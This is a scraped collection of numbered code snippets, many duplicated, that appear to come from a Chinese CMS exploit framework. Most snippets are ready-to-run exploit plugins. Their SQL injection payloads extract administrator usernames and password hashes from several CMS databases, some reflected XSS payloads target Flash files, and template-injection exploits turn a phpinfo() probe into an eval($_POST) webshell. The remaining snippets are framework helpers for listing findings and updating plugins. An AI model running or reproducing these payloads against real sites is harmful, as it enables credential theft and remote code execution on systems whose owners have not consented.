def verify(URL):
    r=requests.get(URL)
    r.close()
    if "Request" in r.content:
        logger.success("Step 1: Exploitable!")
    else:
        logger.error("Step 1: It's not exploitable!")
def exploit(URL):
    url = URL + "/faq.php?action=grouppermission"
    if verify(url):
        manager_hash = get_hash(url)
        logger.success("Username: %s" % manager_hash["username"])
        logger.success("Hash: %s" % manager_hash["md5"])
        return "%s: %s|%s" % (URL, manager_hash["username"], manager_hash["md5"])
 def do_vulns(self, arg):
     """
     漏洞信息
     :param arg: string, 参数
     :return:
     """
     arg = arg.split()
     if not arg:
         vulns = self.show_vulns()
         print "\nVulns\n=====\n"
         print "%-40s%s" % ("Plugin", "Vuln")
         print "%-40s%s" % ("------", "----")
         for plugin, vuln in vulns:
             print "%-40s%s" % (plugin, vuln)
         print
     elif arg[0] == "-d":
         self.clear_vulns()
         logger.success("Clear database successfully.")
     elif arg[0] == "-o":
         plugin_name = arg[1]
         vulns = self.show_vulns()
         with open("vulns.txt", "a") as f:
             f.write(os.linesep)
             f.write("[%s]" % plugin_name + os.linesep)
             for i in vulns:
                 if i[0] == plugin_name:
                     f.write(i[1]+os.linesep)
             f.write(os.linesep)
         logger.success("Save vulns successfully.")
Example #4
0
def exploit(URL, Thread):
    logger.process("Request " + URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
Example #5
0
 def do_vulns(self, arg):
     """
     漏洞信息
     :param arg: string, 参数
     :return:
     """
     arg = arg.split()
     if not arg:
         vulns = self.show_vulns()
         print "\nVulns\n=====\n"
         print "%-40s%s" % ("Plugin", "Vuln")
         print "%-40s%s" % ("------", "----")
         for plugin, vuln in vulns:
             print "%-40s%s" % (plugin, vuln)
         print
     elif arg[0] == "-d":
         self.clear_vulns()
         logger.success("Clear database successfully.")
     elif arg[0] == "-o":
         plugin_name = arg[1]
         vulns = self.show_vulns()
         with open("vulns.txt", "a") as f:
             f.write(os.linesep)
             f.write("[%s]" % plugin_name + os.linesep)
             for i in vulns:
                 if i[0] == plugin_name:
                     f.write(i[1] + os.linesep)
             f.write(os.linesep)
         logger.success("Save vulns successfully.")
Example #6
0
def exploit(URL, Thread):
    logger.process("Request "+URL)
    r = requests.get(URL)
    r.close()
    if r.status_code == 200:
        logger.success("200")
        return "200"
def exploit(URL):
    url = URL + "/faq.php?action=grouppermission"
    if verify(url):
        manager_hash = get_hash(url)
        logger.success("Username: %s" % manager_hash["username"])
        logger.success("Hash: %s" % manager_hash["md5"])
        return "%s: %s|%s" % (URL, manager_hash["username"],
                              manager_hash["md5"])
 def log(self, request, result):
     """
     线程池的 callback
     :return:
     """
     if result:
         self.result = "%s: %s" % (self.url, result)
         logger.success(self.result)
         raise threadpool.NoResultsPending
 def do_rebuild_db(self, line):
     """
     重建数据库
     :return:
     """
     logger.process("Clear current database")
     logger.process("Rebuild database")
     self.db_rebuild()
     logger.success("OK")
Example #10
0
def exploit(URL):
	logger.process("Requesting target site")
	try:
		result=verify(URL)
		logger.success("Username: %s" % result[0])	
		logger.success("password: %s" % result[1])
		return "%s: %s|%s" % (URL, result[0], result[1])
	except:
		pass
Example #11
0
 def log(self, request, result):
     """
     线程池的 callback
     :return:
     """
     if result:
         self.result = "%s: %s" % (self.url, result)
         logger.success(self.result)
         raise threadpool.NoResultsPending
Example #12
0
 def do_rebuild_db(self, line):
     """
     重建数据库
     :return:
     """
     logger.process("Clear current database")
     logger.process("Rebuild database")
     self.db_rebuild()
     logger.success("OK")
def exploit(URL):
    url = URL + "/static/image/common/flvplayer.swf?file=1.flv&" \
                "linkfromdisplay=true&link=javascript:alert(1);"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if hashlib.md5(r.content).hexdigest() == "7d675405ff7c94fa899784b7ccae68d3":
        logger.success("Exploitable!")
        logger.success(url)
        return url
Example #14
0
 def start(self):
     """Start the scan."""
     status("Starting directory scan")
     self.intresting_urls = self._dirscan()
     if self.intresting_urls is not 0:
         success("found %d urls to take a look at..." %
                 (len(self.intresting_urls)))
     for urldic in self.intresting_urls:
         for key in urldic:
             verbose(self, "[%d] %s" % (urldic[key], key))
     self._xss_scan()
def get_hash(url):
    r=requests.get(url)
    r.close()
    try:
        result=re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1)
        username=result.split("|")[1]
        password=result.split("|")[2]
        logger.success("Step 2:")   
        return (username,password)
    except:
        logger.error("Step 2: Finish! It's not exploitable!\nIf step 1 is exploitable,you can try it by hand!\n")
def exploit(URL):
    url=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
    logger.process("Requesting target site")
    verify(URL)
    try:
        result=get_hash(url)
        logger.success("Username: %s" % result[0])  
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (URL, result[0], result[1])
    except:
        pass
def exploit(URL):
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if hashlib.md5(r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    url = URL + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf" \
                "?movieName=\"]%29;}catch%28e%29{}if%28!self.a%29self.a=!ale" \
                "rt%281%29;//"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if hashlib.md5(
            r.content).hexdigest() == "3a1c6cc728dddc258091a601f28a9c12":
        logger.success("Exploitable!")
        logger.success(url)
        return url
Example #19
0
 def do_values(self, arg):
     arg = arg.split()
     if not arg:
         vulns = self.show_vulns()
         print "\nVulns\n=====\n"
         print "%-42s%s" % ("标题", "漏洞")
         print "%-40s%s" % ("------", "----")
         for plugin, vuln in vulns:
             print "%-40s%s" % (plugin, vuln)
         print
     elif arg[0] == "-d":
         self.clear_vulns()
         logger.success("Clear database successfully.")
Example #20
0
def verify(URL):
	r=requests.get(URL+"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
	r.close()
	if "Request Error step 1" in r.content:
		logger.success("Step 1: Exploitable!")
		result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a")
		return result
	elif "Request Error step 2" in r.content:
		logger.success("Step 2: Exploitable!")
		result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a")
		return result
	else:
		logger.error("It's not exploitable!")
Example #21
0
 def init(self):
     try:
         self.cu.execute("DROP TABLE info;")
         self.cu.execute("DROP TABLE sniff")
         self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
         self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
         logger.success("初始化成功")
     except:
         logger.error("初始化错误")
         logger.info("从新建立数据库")
         self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);")
         self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);")
         logger.success("建立成功")
def exploit(URL):
    url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
                r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
                r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
                r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
                r"\\x69\\x70\\x74\\x3e"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "</title><script>alert(document.domain)</script>" in r.text:
        logger.success("Exploitable!")
        logger.success(url)
        return url
def exploit(URL):
    url = URL + r"/?s=\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73" \
                r"\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74" \
                r"\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64" \
                r"\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3c\\x2f\\x73\\x63\\x72" \
                r"\\x69\\x70\\x74\\x3e"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "</title><script>alert(document.domain)</script>" in r.text:
        logger.success("Exploitable!")
        logger.success(url)
        return url
 def do_update(self, line):
     """
     更新
     :return:
     """
     logger.process("")
     logger.process("Attempting to update the CMS Exploit Framework")
     logger.process("")
     logger.process("Downloading plugin list")
     remote_plugins = self.down_plugin_list()
     logger.process("Getting local plugin list")
     local_plugins = self.get_local_plugin_list()
     logger.process("Comparing and updating")
     new_plugins = self.down_plugins(remote_plugins, local_plugins)
     logger.success("New plugins: %s" % str(new_plugins))
     self.do_rebuild_db("")
Example #25
0
 def do_update(self, line):
     """
     更新
     :return:
     """
     logger.process("")
     logger.process("Attempting to update the CMS Exploit Framework")
     logger.process("")
     logger.process("Downloading plugin list")
     remote_plugins = self.down_plugin_list()
     logger.process("Getting local plugin list")
     local_plugins = self.get_local_plugin_list()
     logger.process("Comparing and updating")
     new_plugins = self.down_plugins(remote_plugins, local_plugins)
     logger.success("New plugins: %s" % str(new_plugins))
     self.do_rebuild_db("")
def verify(url):
    """
    判断是否存在注入
    :param url: 网站地址
    :return: bool
    """
    logger.process("Requesting target site")
    r = requests.post(url,
                      data={
                          "gids[99]":
                          "'",
                          "gids[100][0]":
                          ") and (select 1 from (select count(*"
                          "),concat(version(),floor(rand(0)*2))"
                          "x from information_schema.tables gro"
                          "up by x)a)#"
                      },
                      timeout=5)
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def verify(url):
    """
    判断是否存在注入
    :param url: 网站地址
    :return: bool
    """
    logger.process("Requesting target site")
    r = requests.post(
        url,
        data={
            "gids[99]": "'",
            "gids[100][0]": ") and (select 1 from (select count(*"
            "),concat(version(),floor(rand(0)*2))"
            "x from information_schema.tables gro"
            "up by x)a)#",
        },
        timeout=5,
    )
    r.close()
    if "MySQL Query Error" in r.text:
        logger.success("Exploitable!")
        return True
def exploit(URL):
    url = URL + "/index.php/Index/index/name/${@phpinfo()}"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "<title>phpinfo()</title>" in r.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(URL):
    url = URL + "/index.php/Index/index/name/${@phpinfo()}"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "<title>phpinfo()</title>" in r.text:
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % url)
        url = url.replace("@phpinfo()", "@print(eval($_POST[chu]))")
        logger.success("Webshell: %s" % url)
        return url
def exploit(URL):
    url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
                "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
                "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
                "- &sitesearch=http://127.0.0.1/startbbs/"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "chuishere" in r.text:
        logger.success("Exploitable!")
        username, md5 = r.text.split("~~~")[1].split("~")
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % md5)
        return "%s: %s|%s" % (URL, username, md5)
Example #31
0
def exploit(URL, Cookie):
    logger.process("Requesting " + URL)
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
Example #32
0
def exploit(URL):
    url = URL + "/index.php/home/search?q=1'union select 1,2,3,4,concat" \
                "(0x6368756973686572657e7e7e,username,0x7e,password,0x7" \
                "e7e7e),6,7,8,9,0,1,2,3,4,5,6,7 from stb_users limit 1-" \
                "- &sitesearch=http://127.0.0.1/startbbs/"
    logger.process("Requesting target site")
    r = requests.get(url, timeout=5)
    r.close()
    if "chuishere" in r.text:
        logger.success("Exploitable!")
        username, md5 = r.text.split("~~~")[1].split("~")
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % md5)
        return "%s: %s|%s" % (URL, username, md5)
Example #33
0
def exploit(URL, Cookie):
    logger.process("Requesting " + URL)
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(url=url, cookies=Cookie, timeout=5)
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL):
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
    ]

    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D", "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
Example #35
0
def exploit(URL):
    urls = [
        URL + "/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D",
        URL + "/search.html?keyword=%24%7B%40phpinfo%28%29%7D"
    ]

    for i, url in zip(range(1, 3), urls):
        logger.process("Testing URL %d..." % i)
        r = requests.get(url, timeout=5)
        r.close()
        if "<title>phpinfo()</title>" in r.text:
            logger.success("Exploitable!")
            logger.success("Phpinfo: %s" % url)
            url = url.replace("%24%7B%40phpinfo%28%29%7D",
                              "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
            logger.success("WebShell: %s" % url)
            return url
def exploit(URL, Cookie):
    logger.process("Requesting "+URL)
    url = URL + "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686" \
                "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647" \
                "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
def exploit(URL, Cookie):
    logger.process("Requesting "+URL)
    url = URL + "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select" \
                "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e," \
                "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    r = requests.get(
        url=url,
        cookies=Cookie,
        timeout=5
    )
    r.close()
    if "handsomechu" in r.text:
        logger.success("Exploitable!")
        handsomechu = r.text.split("handsomechu")[1].split("~~~")
        username, password = handsomechu
        logger.success("Username: %s" % username)
        logger.success("Hash: %s" % password)
        return "%s: %s|%s" % (URL, username, password)
Example #38
0
 def do_init_db(self, line):
     logger.process("初始化数据库")
     self.db_init()
     logger.success("OK")
Example #39
0
 def do_rebuild_db(self, line):
     logger.process("清空数据库")
     logger.process("重建数据库")
     self.db_rebuild()
     logger.success("OK")